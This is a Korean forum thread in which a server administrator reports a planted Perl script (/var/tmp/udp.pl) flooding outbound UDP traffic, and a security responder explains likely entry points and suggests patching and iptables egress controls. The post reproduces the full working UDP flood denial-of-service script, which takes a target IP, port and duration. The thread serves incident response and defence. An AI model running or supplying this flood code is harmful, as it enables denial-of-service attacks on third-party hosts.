/var/tmp/udp.pl

안녕하십니까? 오늘과내일의 홍석범입니다.

아래 올려주신 공격 형태는 최근 많이 보이고 있는 형태이며 udp의 경우 tcp나 icmp에 비해 대량의 pps를 유발할 수 있기에 주로 특정 사이트에 대한 대량의 패킷유발을 위해 많이 사용되고 있습니다.

주로는, 웹해킹등 을 통해 nobody 권한을 획득하거나 id/pw가 쉬운 유저에 대한 무작위 대입법을 통해 일반 유저 권한을 획득후 실행하는 경우가 대부분인데, 거의 대부분 전자의 웹해킹을 통해 시도하는 경우가 많이 있으니, 제로보드나 technote등의 취
약성은 패치가 되었는지 확인해 보시기 바랍니다.

아울러, 지속적인 패킷유발이 된다면,  iptables를 이용하여 outbound 트래픽을 제어하시는 것도 좋습니다.

 
감사합니다.

구정 전날인 오늘 아침에 갑자기 인터넷이 안되기에 이것 저거 조취를 취하던 중

방화벽업체와 연락하여 우리쪽 서버중 한대에서 많은 양의 패킷을 송신하고 있다고 하여

조사하여 보니 udp 프로토콜로 계속 트래픽을 발생하고 있었습니다.

그래서 찾아보니 /var/tmp/udp.pl이란 파일이 생성되어 있고 여기에서 트래픽이 시작된거 같습니다.

파일의 내용은 이렇습니다.

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 ";
 printf "if arg1/2 =0, randports/continous packets. ";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1];
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "udp flood - Revenge ";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

여러분들도 조심하십시요....

인터넷검색해보니 프비도 뚫렸다고 합니다.

저두 소잃고 외양간 고치는 격으로 루트패스워드 부터 바꾸었습니다....